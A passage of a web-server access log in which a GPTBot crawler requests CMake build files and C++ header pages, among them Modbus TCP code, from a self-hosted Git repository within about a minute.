+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16832] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21649] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10820] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:55:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10817] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:55:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10822] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:55:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:55:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:55:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9994] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21650] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10238] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10224] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:55:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13907] [Gzip 7.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:55:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10226] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:55:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11295] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:55:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11296] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10687] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10449] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10465] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10466] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10460] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13339] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10448] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" -[17/Feb/2026:15:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot" [Client 74.7.227.38] [Length 12287] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:15:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64?display=source" [Client 74.7.227.38] [Length 11057] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:15:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64?display=rendered" [Client 74.7.227.38] [Length 10994] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:15:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln?display=rendered" [Client 74.7.227.38] [Length 10837] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" -[17/Feb/2026:15:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15255] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15254] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr 